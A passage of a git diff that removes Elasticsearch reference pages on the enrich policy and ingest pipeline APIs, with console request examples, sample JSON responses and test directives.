"parent_task_id": "oTUltX4IQMOUUVeiohTt8A:123", - "headers": { - "X-Opaque-Id": "123456" - } - } - } - ], - "coordinator_stats": [ - { - "node_id": "1sFM8cmSROZYhPxVsiWew", - "queue_size": 0, - "remote_requests_current": 0, - "remote_requests_total": 0, - "executed_searches_total": 0 - } - ] -} ----- -// TESTRESPONSE[s/"executing_policies": \[[^\]]*\]/"executing_policies": $body.$_path/] -// TESTRESPONSE[s/"node_id": "1sFM8cmSROZYhPxVsiWew"/"node_id" : $body.coordinator_stats.0.node_id/] -// TESTRESPONSE[s/"remote_requests_total": 0/"remote_requests_total" : $body.coordinator_stats.0.remote_requests_total/] -// TESTRESPONSE[s/"executed_searches_total": 0/"executed_searches_total" : $body.coordinator_stats.0.executed_searches_total/] diff --git a/docs/reference/ingest/apis/enrich/execute-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/execute-enrich-policy.asciidoc deleted file mode 100644 index 35e9b9e69b5..00000000000 --- a/docs/reference/ingest/apis/enrich/execute-enrich-policy.asciidoc +++ /dev/null @@ -1,111 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[execute-enrich-policy-api]] -=== Execute enrich policy API -++++ -Execute enrich policy -++++ - -Executes an existing <>. 
- -//// - -[source,console] ----- -PUT /users/_doc/1?refresh -{ - "email": "mardy.brown@asciidocsmith.com", - "first_name": "Mardy", - "last_name": "Brown", - "city": "New Orleans", - "county": "Orleans", - "state": "LA", - "zip": 70116, - "web": "mardy.asciidocsmith.com" -} - -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -PUT /_enrich/policy/my-policy/_execute --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] -//// - - -[[execute-enrich-policy-api-request]] -==== {api-request-title} - -`PUT /_enrich/policy//_execute` - -`POST /_enrich/policy//_execute` - - -[[execute-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -include::put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - - -[[execute-enrich-policy-api-desc]] -==== {api-description-title} - -Use the execute enrich policy API -to create the enrich index for an existing enrich policy. - -// tag::execute-enrich-policy-def[] -The _enrich index_ contains documents from the policy's source indices. -Enrich indices always begin with `.enrich-*`, -are read-only, -and are <>. - -[WARNING] -==== -Enrich indices should be used by the <> only. -Avoid using enrich indices for other purposes. -==== -// end::execute-enrich-policy-def[] - -// tag::update-enrich-index[] -Once created, you cannot update -or index documents to an enrich index. -Instead, update your source indices -and <> the enrich policy again. -This creates a new enrich index from your updated source indices -and deletes the previous enrich index. -// end::update-enrich-index[] - -Because this API request performs several operations, -it may take a while to return a response. - -[[execute-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Enrich policy to execute. - -[[execute-enrich-policy-api-request-body]] -==== {api-request-body-title} - -`wait_for_completion`:: -(Required, Boolean) -If `true`, the request blocks other enrich policy execution requests until -complete. Defaults to `true`. diff --git a/docs/reference/ingest/apis/enrich/get-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/get-enrich-policy.asciidoc deleted file mode 100644 index 7d32d889629..00000000000 --- a/docs/reference/ingest/apis/enrich/get-enrich-policy.asciidoc +++ /dev/null @@ -1,232 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-enrich-policy-api]] -=== Get enrich policy API -++++ -Get enrich policy -++++ - -Returns information about an <>. 
- -//// -[source,console] ----- -PUT /users -{ - "mappings" : { - "properties" : { - "email" : { "type" : "keyword" } - } - } -} - -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} - -PUT /_enrich/policy/other-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -//// - -[source,console] --------------------------------------------------- -GET /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] - - -[[get-enrich-policy-api-request]] -==== {api-request-title} - -`GET /_enrich/policy/` - -`GET /_enrich/policy` - -`GET /_enrich/policy/policy1,policy2` - - -[[get-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -include::put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - - -[[get-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Optional, string) -Comma-separated list of enrich policy names -used to limit the request. - -To return information for all enrich policies, -omit this parameter. --- - - -[[get-enrich-policy-api-example]] -==== {api-examples-title} - - -[[get-enrich-policy-api-single-ex]] -===== Get a single policy - -[source,console] --------------------------------------------------- -GET /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "policies": [ - { - "config": { - "match": { - "name": "my-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - } - ] -} --------------------------------------------------- - - -[[get-enrich-policy-api-commas-ex]] -===== Get multiple policies - -[source,console] --------------------------------------------------- -GET /_enrich/policy/my-policy,other-policy --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,js] --------------------------------------------------- -{ - "policies": [ - { - "config": { - "match": { - "name": "my-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - }, - { - "config": { - "match": { - "name": "other-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE - - -[[get-enrich-policy-api-all-ex]] -===== Get all policies - -[source,console] --------------------------------------------------- -GET /_enrich/policy --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "policies": [ - { - "config": { - "match": { - "name": "my-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - "state" - ] - } - } - }, - { - "config": { - "match": { - "name": "other-policy", - "indices": [ "users" ], - "match_field": "email", - "enrich_fields": [ - "first_name", - "last_name", - "city", - "zip", - 
"state" - ] - } - } - } - ] -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy -DELETE /_enrich/policy/other-policy --------------------------------------------------- -// TEST[continued] -//// diff --git a/docs/reference/ingest/apis/enrich/index.asciidoc b/docs/reference/ingest/apis/enrich/index.asciidoc deleted file mode 100644 index 6e013a3b4a5..00000000000 --- a/docs/reference/ingest/apis/enrich/index.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[enrich-apis]] -== Enrich APIs - -The following enrich APIs are available for managing <>: - -* <> to create or replace an enrich policy -* <> to delete an enrich policy -* <> to return information about an enrich policy -* <> to execute an enrich policy -* <> to get enrich-related stats - - -include::put-enrich-policy.asciidoc[] - -include::delete-enrich-policy.asciidoc[] - -include::get-enrich-policy.asciidoc[] - -include::execute-enrich-policy.asciidoc[] - -include::enrich-stats.asciidoc[] diff --git a/docs/reference/ingest/apis/enrich/put-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/put-enrich-policy.asciidoc deleted file mode 100644 index f001e3f2065..00000000000 --- a/docs/reference/ingest/apis/enrich/put-enrich-policy.asciidoc +++ /dev/null @@ -1,96 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[put-enrich-policy-api]] -=== Put enrich policy API -++++ -Put enrich policy -++++ - -Creates an enrich policy. - -//// -[source,console] ----- -PUT /users -{ - "mappings": { - "properties": { - "email": { "type": "keyword" } - } - } -} ----- -//// - -[source,console] ----- -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": ["first_name", "last_name", "city", "zip", "state"] - } -} ----- -// TEST[continued] - -//// -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy --------------------------------------------------- -// TEST[continued] -//// - - -[[put-enrich-policy-api-request]] -==== {api-request-title} - -`PUT /_enrich/policy/` - - -[[put-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -// tag::enrich-policy-api-prereqs[] -If you use {es} {security-features}, you must have: - -* `read` index privileges for any indices used -* The `enrich_user` <> -// end::enrich-policy-api-prereqs[] - - -[[put-enrich-policy-api-desc]] -==== {api-description-title} - -Use the put enrich policy API -to create a new <>. - -[WARNING] -==== -include::../../enrich.asciidoc[tag=update-enrich-policy] -==== - - - -[[put-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=enrich-policy] - - -[[put-enrich-policy-api-request-body]] -==== {api-request-body-title} - -``:: -+ --- -(Required, <> object) -Enrich policy used to match and add the right enrich data to -the right incoming documents. - -See <> for object definition and parameters. --- diff --git a/docs/reference/ingest/apis/get-pipeline.asciidoc b/docs/reference/ingest/apis/get-pipeline.asciidoc deleted file mode 100644 index f5e25cbc3a3..00000000000 --- a/docs/reference/ingest/apis/get-pipeline.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[get-pipeline-api]] -=== Get pipeline API -++++ -Get pipeline -++++ - -Returns information about one or more ingest pipelines. -This API returns a local reference of the pipeline. 
- -//// -[source,console] ----- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "version" : 123, - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} ----- -//// - -[source,console] ----- -GET /_ingest/pipeline/my-pipeline-id ----- -// TEST[continued] - - - -[[get-pipeline-api-request]] -==== {api-request-title} - -`GET /_ingest/pipeline/` - -`GET /_ingest/pipeline` - -[[get-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - -[[get-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of pipeline IDs to retrieve. Wildcard (`*`) expressions are -supported. -+ -To get all ingest pipelines, omit this parameter or use `*`. - - -[[get-pipeline-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[get-pipeline-api-api-example]] -==== {api-examples-title} - - -[[get-pipeline-api-specific-ex]] -===== Get information for a specific ingest pipeline - -[source,console] ----- -GET /_ingest/pipeline/my-pipeline-id ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-pipeline-id" : { - "description" : "describe pipeline", - "version" : 123, - "processors" : [ - { - "set" : { - "field" : "foo", - "value" : "bar" - } - } - ] - } -} ----- - - -[[get-pipeline-api-version-ex]] -===== Get the version of an ingest pipeline - -When you create or update an ingest pipeline, -you can specify an optional `version` parameter. -The version is useful for managing changes to pipeline -and viewing the current pipeline for an ingest node. - - -To check the pipeline version, -use the `filter_path` query parameter -to <> -to only the version. - -[source,console] ----- -GET /_ingest/pipeline/my-pipeline-id?filter_path=*.version ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-pipeline-id" : { - "version" : 123 - } -} ----- - -//// -[source,console] ----- -DELETE /_ingest/pipeline/my-pipeline-id ----- -// TEST[continued] - -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// diff --git a/docs/reference/ingest/apis/index.asciidoc b/docs/reference/ingest/apis/index.asciidoc deleted file mode 100644 index c1ad765fcc6..00000000000 --- a/docs/reference/ingest/apis/index.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[ingest-apis]] -== Ingest APIs - -The following ingest APIs are available for managing pipelines: - -* <> to add or update a pipeline -* <> to return a specific pipeline -* <> to delete a pipeline -* <> to simulate a call to a pipeline - - -include::put-pipeline.asciidoc[] -include::get-pipeline.asciidoc[] -include::delete-pipeline.asciidoc[] -include::simulate-pipeline.asciidoc[] diff --git a/docs/reference/ingest/apis/put-pipeline.asciidoc b/docs/reference/ingest/apis/put-pipeline.asciidoc deleted file mode 100644 index 32b5dbbc384..00000000000 --- a/docs/reference/ingest/apis/put-pipeline.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[put-pipeline-api]] -=== Put pipeline API -++++ -Put pipeline -++++ - -Creates or updates an ingest pipeline. -Changes made using this API take effect immediately. 
- -[source,console] ----- -PUT _ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} ----- - - -[[put-pipeline-api-request]] -==== {api-request-title} - -`PUT /_ingest/pipeline/` - -[[put-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - - -[[put-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) ID of the ingest pipeline to create or update. - - -[[put-pipeline-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[put-pipeline-api-response-body]] -==== {api-response-body-title} - -`description`:: -(Required, string) -Description of the ingest pipeline. - -`processors`:: -+ --- -(Required, array of <>) -Array of processors used to pre-process documents -before indexing. - -Processors are executed in the order provided. - -See <> for processor object definitions -and a list of built-in processors. --- - -`version`:: -+ --- -(Optional, integer) -Optional version number used by external systems to manage ingest pipelines. - -Versions are not used or validated by {es}; -they are intended for external management only. --- - - -[[put-pipeline-api-example]] -==== {api-examples-title} - - -[[versioning-pipelines]] -===== Pipeline versioning - -When creating or updating an ingest pipeline, -you can specify an optional `version` parameter. -The version is useful for managing changes to pipeline -and viewing the current pipeline for an ingest node. - -The following request sets a version number of `123` -for `my-pipeline-id`. - -[source,console] --------------------------------------------------- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "version" : 123, - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} --------------------------------------------------- - -To unset the version number, -replace the pipeline without specifying a `version` parameter. - -[source,console] --------------------------------------------------- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "describe pipeline", - "processors" : [ - { - "set" : { - "field": "foo", - "value": "bar" - } - } - ] -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_ingest/pipeline/my-pipeline-id --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ -"acknowledged": true -} --------------------------------------------------- -//// diff --git a/docs/reference/ingest/apis/simulate-pipeline.asciidoc b/docs/reference/ingest/apis/simulate-pipeline.asciidoc deleted file mode 100644 index 545eb70063f..00000000000 --- a/docs/reference/ingest/apis/simulate-pipeline.asciidoc +++ /dev/null @@ -1,451 +0,0 @@ - -[[simulate-pipeline-api]] -=== Simulate pipeline API -++++ -Simulate pipeline -++++ - -Executes an ingest pipeline against -a set of provided documents. 
- -//// -[source,console] ----- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "example pipeline to simulate", - "processors": [ - { - "set" : { - "field" : "field2", - "value" : "_value" - } - } - ] -} ----- -// TESTSETUP -//// - -[source,console] ----- -POST /_ingest/pipeline/my-pipeline-id/_simulate -{ - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - - -[[simulate-pipeline-api-request]] -==== {api-request-title} - -`POST /_ingest/pipeline//_simulate` - -`GET /_ingest/pipeline//_simulate` - -`POST /_ingest/pipeline/_simulate` - -`GET /_ingest/pipeline/_simulate` - -[[simulate-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - -[[simulate-pipeline-api-desc]] -==== {api-description-title} - -The simulate pipeline API executes a specific pipeline -against a set of documents provided in the body of the request. - -You can either specify an existing pipeline -to execute against the provided documents -or supply a pipeline definition in the body of the request. - - -[[simulate-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Pipeline ID used to simulate an ingest. - - -[[simulate-pipeline-api-query-params]] -==== {api-query-parms-title} - -`verbose`:: -(Optional, Boolean) -If `true`, -the response includes output data -for each processor in the executed pipeline. - - -[[simulate-pipeline-api-request-body]] -==== {api-request-body-title} - -`description`:: -(Optional, string) -Description of the ingest pipeline. - -`processors`:: -+ --- -(Optional, array of <>) -Array of processors used to pre-process documents -during ingest. - -Processors are executed in the order provided. - -See <> for processor object definitions -and a list of built-in processors. --- - -`docs`:: -+ --- -(Required, array) -Array of documents -ingested by the pipeline. - -Document object parameters include: - -`_index`:: -(Optional, string) -Name of the index containing the document. - -`_id`:: -(Optional, string) -Unique identifier for the document. -This ID is only unique within the index. - -`_source`:: -(Required, object) -JSON body for the document. 
--- - - -[[simulate-pipeline-api-example]] -==== {api-examples-title} - - -[[simulate-pipeline-api-path-parm-ex]] -===== Specify a pipeline as a path parameter - -[source,console] ----- -POST /_ingest/pipeline/my-pipeline-id/_simulate -{ - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "docs": [ - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "bar" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.187Z" - } - } - }, - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "rab" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.188Z" - } - } - } - ] -} ----- -// TESTRESPONSE[s/"2017-05-04T22:30:03.187Z"/$body.docs.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2017-05-04T22:30:03.188Z"/$body.docs.1.doc._ingest.timestamp/] - - -[[simulate-pipeline-api-request-body-ex]] -===== Specify a pipeline in the request body - -[source,console] ----- -POST /_ingest/pipeline/_simulate -{ - "pipeline" : - { - "description": "_description", - "processors": [ - { - "set" : { - "field" : "field2", - "value" : "_value" - } - } - ] - }, - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "docs": [ - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "bar" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.187Z" - } - } - }, - { - "doc": { - "_id": "id", - "_index": "index", - "_type": "_doc", - "_source": { - "field2": "_value", - "foo": "rab" - }, - "_ingest": { - "timestamp": "2017-05-04T22:30:03.188Z" - } - } - } - ] -} ----- -// TESTRESPONSE[s/"2017-05-04T22:30:03.187Z"/$body.docs.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2017-05-04T22:30:03.188Z"/$body.docs.1.doc._ingest.timestamp/] - - -[[ingest-verbose-param]] -===== View verbose results - -You can use the simulate pipeline API -to see how each processor affects the ingest document -as it passes through the pipeline. -To see the intermediate results -of each processor in the simulate request, -you can add the `verbose` parameter to the request. 
- -[source,console] ----- -POST /_ingest/pipeline/_simulate?verbose=true -{ - "pipeline" : - { - "description": "_description", - "processors": [ - { - "set" : { - "field" : "field2", - "value" : "_value2" - } - }, - { - "set" : { - "field" : "field3", - "value" : "_value3" - } - } - ] - }, - "docs": [ - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "bar" - } - }, - { - "_index": "index", - "_id": "id", - "_source": { - "foo": "rab" - } - } - ] -} ----- - -The API returns the following response: - -[source,console-result] ----- -{ - "docs": [ - { - "processor_results": [ - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field2": "_value2", - "foo": "bar" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251836Z" - } - } - }, - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field3": "_value3", - "field2": "_value2", - "foo": "bar" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251836Z" - } - } - } - ] - }, - { - "processor_results": [ - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field2": "_value2", - "foo": "rab" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251863Z" - } - } - }, - { - "processor_type": "set", - "status": "success", - "doc": { - "_index": "index", - "_type": "_doc", - "_id": "id", - "_source": { - "field3": "_value3", - "field2": "_value2", - "foo": "rab" - }, - "_ingest": { - "pipeline": "_simulate_pipeline", - "timestamp": "2020-07-30T01:21:24.251863Z" - } - } - } - ] - } - ] -} - ----- -// TESTRESPONSE[s/"2020-07-30T01:21:24.251836Z"/$body.docs.0.processor_results.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2020-07-30T01:21:24.251836Z"/$body.docs.0.processor_results.1.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2020-07-30T01:21:24.251863Z"/$body.docs.1.processor_results.0.doc._ingest.timestamp/] -// TESTRESPONSE[s/"2020-07-30T01:21:24.251863Z"/$body.docs.1.processor_results.1.doc._ingest.timestamp/] - -//// -[source,console] ----- -DELETE /_ingest/pipeline/* ----- - -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// diff --git a/docs/reference/ingest/enrich.asciidoc b/docs/reference/ingest/enrich.asciidoc deleted file mode 100644 index 49195ecda7a..00000000000 --- a/docs/reference/ingest/enrich.asciidoc +++ /dev/null @@ -1,624 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ingest-enriching-data]] -== Enrich your data - -You can use the <> to add data from your -existing indices to incoming documents during ingest. - -For example, you can use the enrich processor to: - -* Identify web services or vendors based on known IP addresses -* Add product information to retail orders based on product IDs -* Supplement contact information based on an email address -* Add postal codes based on user coordinates - -[discrete] -[[how-enrich-works]] -=== How the enrich processor works - -An <> changes documents before they are actually -indexed. You can think of an ingest pipeline as an assembly line made up of a -series of workers, called <>. Each processor makes -specific changes, like lowercasing field values, to incoming documents before -moving on to the next. 
When all the processors in a pipeline are done, the -finished document is added to the target index. - -image::images/ingest/ingest-process.svg[align="center"] - -Most processors are self-contained and only change _existing_ data in incoming -documents. But the enrich processor adds _new_ data to incoming documents -and requires a few special components: - -image::images/ingest/enrich/enrich-process.svg[align="center"] - -[[enrich-policy]] -enrich policy:: -+ --- -A set of configuration options used to add the right enrich data to the right -incoming documents. - -An enrich policy contains: - -// tag::enrich-policy-fields[] -* A list of one or more _source indices_ which store enrich data as documents -* The _policy type_ which determines how the processor matches the enrich data - to incoming documents -* A _match field_ from the source indices used to match incoming documents -* _Enrich fields_ containing enrich data from the source indices you want to add - to incoming documents -// end::enrich-policy-fields[] - -Before it can be used with an enrich processor, an enrich policy must be -<>. When executed, an enrich policy uses -enrich data from the policy's source indices to create a streamlined system -index called the _enrich index_. The processor uses this index to match and -enrich incoming documents. - -See <> for a full list of enrich policy types and -configuration options. --- - -[[source-index]] -source index:: -An index which stores enrich data you'd like to add to incoming documents. You -can create and manage these indices just like a regular {es} index. You can use -multiple source indices in an enrich policy. You also can use the same source -index in multiple enrich policies. - -[[enrich-index]] -enrich index:: -+ --- -A special system index tied to a specific enrich policy. - -Directly matching incoming documents to documents in source indices could be -slow and resource intensive. To speed things up, the enrich processor uses an -enrich index. - -Enrich indices contain enrich data from source indices but have a few special -properties to help streamline them: - -* They are system indices, meaning they're managed internally by {es} and only - intended for use with enrich processors. -* They always begin with `.enrich-*`. -* They are read-only, meaning you can't directly change them. -* They are <> for fast retrieval. --- - -[role="xpack"] -[testenv="basic"] -[[enrich-setup]] -=== Set up an enrich processor - -To set up an enrich processor, follow these steps: - -. Check the <>. -. <>. -. <>. -. <>. -. <>. -. <>. - -Once you have an enrich processor set up, -you can <> -and <>. - -[IMPORTANT] -==== -The enrich processor performs several operations -and may impact the speed of your <>. - -We strongly recommend testing and benchmarking your enrich processors -before deploying them in production. - -We do not recommend using the enrich processor to append real-time data. -The enrich processor works best with reference data -that doesn't change frequently. -==== - -[discrete] -[[enrich-prereqs]] -==== Prerequisites - -include::{es-repo-dir}/ingest/apis/enrich/put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - -[[create-enrich-source-index]] -==== Add enrich data - -To begin, add documents to one or more source indices. These documents should -contain the enrich data you eventually want to add to incoming documents. - -You can manage source indices just like regular {es} indices using the -<> and <> APIs. 
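For example, a minimal sketch of adding one enrich document to a `users` source index (the index name and field values are illustrative and mirror the match policy example later in this document):

[source,console]
----
PUT /users/_doc/1?refresh=wait_for
{
  "email": "mardy.brown@asciidocsmith.com",
  "first_name": "Mardy",
  "last_name": "Brown",
  "city": "New Orleans",
  "state": "LA",
  "zip": 70116
}
----

When a policy that lists `users` as a source index is executed, documents like this one are copied into the policy's enrich index.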
- -You also can set up {beats-ref}/getting-started.html[{beats}], such as a -{filebeat-ref}/filebeat-installation-configuration.html[{filebeat}], to -automatically send and index documents to your source indices. See -{beats-ref}/getting-started.html[Getting started with {beats}]. - -[[create-enrich-policy]] -==== Create an enrich policy - -After adding enrich data to your source indices, you can -<>. When defining the enrich -policy, you should include at least the following: - -include::enrich.asciidoc[tag=enrich-policy-fields] - -You can use this definition to create the enrich policy with the -<>. - -[WARNING] -==== -Once created, you can't update or change an enrich policy. -See <>. -==== - -[[execute-enrich-policy]] -==== Execute the enrich policy - -Once the enrich policy is created, you can execute it using the -<> to create an -<>. - -image::images/ingest/enrich/enrich-policy-index.svg[align="center"] - -include::apis/enrich/execute-enrich-policy.asciidoc[tag=execute-enrich-policy-def] - -[[add-enrich-processor]] -==== Add an enrich processor to an ingest pipeline - -Once you have source indices, an enrich policy, and the related enrich index in -place, you can set up an ingest pipeline that includes an enrich processor for -your policy. - -image::images/ingest/enrich/enrich-processor.svg[align="center"] - -Define an <> and add it to an ingest -pipeline using the <>. - -When defining the enrich processor, you must include at least the following: - -* The enrich policy to use. -* The field used to match incoming documents to the documents in your enrich index. -* The target field to add to incoming documents. This target field contains the -match and enrich fields specified in your enrich policy. - -You also can use the `max_matches` option to set the number of enrich documents -an incoming document can match. If set to the default of `1`, data is added to -an incoming document's target field as a JSON object. Otherwise, the data is -added as an array. - -See <> for a full list of configuration options. - -You also can add other <> to your ingest pipeline. - -[[ingest-enrich-docs]] -==== Ingest and enrich documents - -You can now use your ingest pipeline to enrich and index documents. - -image::images/ingest/enrich/enrich-process.svg[align="center"] - -Before implementing the pipeline in production, we recommend indexing a few test -documents first and verifying enrich data was added correctly using the -<>. - -[[update-enrich-data]] -==== Update an enrich index - -include::{es-repo-dir}/ingest/apis/enrich/execute-enrich-policy.asciidoc[tag=update-enrich-index] - -If wanted, you can <> -or <> any already ingested documents -using your ingest pipeline. - -[[update-enrich-policies]] -==== Update an enrich policy - -// tag::update-enrich-policy[] -Once created, you can't update or change an enrich policy. -Instead, you can: - -. Create and <> a new enrich policy. - -. Replace the previous enrich policy - with the new enrich policy - in any in-use enrich processors. - -. Use the <> API - to delete the previous enrich policy. -// end::update-enrich-policy[] - -[role="xpack"] -[testenv="basic"] -[[enrich-policy-definition]] -=== Enrich policy definition - -<> are defined as JSON objects like the -following: - -[source,js] ----- -{ - "": { - "indices": [ "..." ], - "match_field": "...", - "enrich_fields": [ "..." ], - "query": {... 
} - } -} ----- -// NOTCONSOLE - -[[enrich-policy-parms]] -==== Parameters - -``:: -+ --- -(Required, enrich policy object) -The enrich policy type determines how enrich data is matched to incoming -documents. - -Supported enrich policy types include: - -<>::: -Matches enrich data to incoming documents based on a geographic location using -a <>. For an example, see -<>. - -<>::: -Matches enrich data to incoming documents based on a precise value, such as an -email address or ID, using a <>. For an -example, see <>. --- - -`indices`:: -+ --- -(Required, String or array of strings) -Source indices used to create the enrich index. - -If multiple indices are provided, they must share a common `match_field`, which -the enrich processor can use to match incoming documents. --- - -`match_field`:: -(Required, string) -Field in the source indices used to match incoming documents. - -`enrich_fields`:: -(Required, Array of strings) -Fields to add to matching incoming documents. These fields must be present in -the source indices. - -`query`:: -(Optional, <>) -Query used to filter documents in the enrich index for matching. Defaults to -a <> query. - -[role="xpack"] -[testenv="basic"] -[[geo-match-enrich-policy-type]] -=== Example: Enrich your data based on geolocation - -`geo_match` <> match enrich data to incoming -documents based on a geographic location, using a -<>. - -The following example creates a `geo_match` enrich policy that adds postal -codes to incoming documents based on a set of coordinates. It then adds the -`geo_match` enrich policy to a processor in an ingest pipeline. - -Use the <> to create a source index -containing at least one `geo_shape` field. - -[source,console] ----- -PUT /postal_codes -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - }, - "postal_code": { - "type": "keyword" - } - } - } -} ----- - -Use the <> to index enrich data to this source index. - -[source,console] ----- -PUT /postal_codes/_doc/1?refresh=wait_for -{ - "location": { - "type": "envelope", - "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ] - }, - "postal_code": "96598" -} ----- -// TEST[continued] - -Use the <> to create an enrich -policy with the `geo_match` policy type. This policy must include: - -* One or more source indices -* A `match_field`, - the `geo_shape` field from the source indices used to match incoming documents -* Enrich fields from the source indices you'd like to append to incoming - documents - -[source,console] ----- -PUT /_enrich/policy/postal_policy -{ - "geo_match": { - "indices": "postal_codes", - "match_field": "location", - "enrich_fields": [ "location", "postal_code" ] - } -} ----- -// TEST[continued] - -Use the <> to create an -enrich index 